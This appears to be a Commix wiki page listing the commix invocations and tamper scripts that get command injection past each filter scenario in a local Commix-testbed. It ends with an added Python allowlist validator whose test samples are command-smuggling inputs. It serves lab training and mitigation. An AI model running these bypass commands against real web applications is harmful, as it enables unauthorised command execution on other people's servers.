Filters Bypasses
Note: The following filter bypasses are based on the dockerized version of Commix-testbed.
- Filter lax_domain_name.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --suffix="d.e.f"
- Filter nested_quotes.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --level=3
- Filter no_space.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_space_no_colon_no_pipe_no_ampersand.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_space_no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_white_chars.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_white_chars_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_white_chars_stop_alnum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter simple_stop_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1"
- Filter simple_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"
- Filter multiple_os_commands_blacklisting.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"
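The mitigation side of the list above, as an added example that is not part of the Commix wiki or the testbed code: instead of deny-listing characters, the `addr` value is checked against an allowlist (IP literal or strict hostname) and passed as a single argv element with no shell. It assumes the scenarios hand `addr` to a ping-style command, which this page does not state; all function names and sample values are hypothetical.

```python
import ipaddress
import re
import subprocess

# One hostname label: letters, digits, inner hyphens; must start and end alphanumeric.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")

# Constructed samples: values carrying the kinds of characters the tamper
# scripts named above substitute in (${IFS}, horizontal tab), plus separators.
REJECTED_SAMPLES = [
    "127.0.0.1 x", "127.0.0.1${IFS}x", "127.0.0.1\tx", "127.0.0.1;x",
    "127.0.0.1|x", "127.0.0.1&x", "127.0.0.1$u", "127.0.0.1\n", "-c5", "",
]


def validate_addr(value):
    """Return a normalised IP literal or the hostname; raise ValueError otherwise."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    # fullmatch (not match with "$") so a trailing newline cannot slip through
    labels = value.split(".")
    if len(value) <= 253 and all(_LABEL.fullmatch(label) for label in labels):
        return value
    raise ValueError("addr is not an IP address or hostname")


def build_ping_argv(addr):
    """Build an argv list; "--" ends option parsing before the user value."""
    return ["ping", "-c", "1", "--", validate_addr(addr)]


def run_ping(addr):
    # No shell=True: the value is one argument and is never parsed as shell syntax.
    return subprocess.run(build_ping_argv(addr), capture_output=True,
                          text=True, timeout=5, check=False)


def rejects(value):
    """True when validate_addr refuses the value."""
    try:
        validate_addr(value)
    except ValueError:
        return True
    return False
```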